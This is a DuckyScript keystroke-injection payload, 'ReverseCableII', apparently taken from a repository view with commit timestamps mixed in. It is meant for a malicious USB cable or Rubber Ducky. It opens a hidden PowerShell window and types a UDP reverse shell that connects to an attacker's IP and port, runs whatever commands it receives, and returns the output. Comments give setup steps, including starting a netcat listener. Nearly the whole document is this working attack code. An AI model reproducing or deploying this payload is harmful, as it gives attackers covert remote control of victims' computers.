2022-02-01 11:08:57 +00:00
|
|
|
REM ReverseCableII
|
|
|
|
REM Version 1.0
|
|
|
|
REM OS: Windows / Linux(?) (Not tested with Powershell on Linux)
|
2024-05-28 17:28:14 +00:00
|
|
|
REM Author: 0i41E
|
2022-02-01 11:08:57 +00:00
|
|
|
|
|
|
|
REM UDP Reverse shell, based on ReverseDuckyIII, executed in the background. Might create a firewall pop up, but will execute anyway.
|
|
|
|
REM Fill in Attacker-IP and Port in Line 20
|
|
|
|
REM DON'T FORGET TO START LISTENER: nc -ulv -p PORT
|
|
|
|
|
|
|
|
DELAY 500
|
|
|
|
DUCKY_LANG de
|
|
|
|
DELAY 1500
|
|
|
|
GUI r
|
|
|
|
DELAY 500
|
|
|
|
STRING powershell -NoP -NonI -W hidden
|
|
|
|
DELAY 250
|
|
|
|
ENTER
|
|
|
|
|
|
|
|
DELAY 200
|
|
|
|
STRING $E=New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse("0.0.0.0"),PORT);$C=New-Object System.Net.So
|
|
|
|
DELAY 100
|
|
|
|
STRING ckets.UDPClient(53);[byte[]]$B=0..65535|%{0};$SB=([text.encoding]::ASCII).GetBytes('ReverseCableII:');$C.Send($SB,$S
|
|
|
|
DELAY 100
|
|
|
|
STRING B.Length,$E);while($true){;$R=$C.Receive([ref]$E);$RD=([text.encoding]::ASCII).GetString($R);$s=(iex $RD 2>&1 | Out-S
|
|
|
|
DELAY 100
|
|
|
|
STRING tring );$s2=$s+'O.MG@PS ' + (pwd).Path + '> ';$SB =([text.encoding]::ASCII).GetBytes($s2);$C.Send($SB,$SB.Len
|
|
|
|
DELAY 100
|
|
|
|
STRING gth,$E)};$C.Close()
|
|
|
|
ENTER
|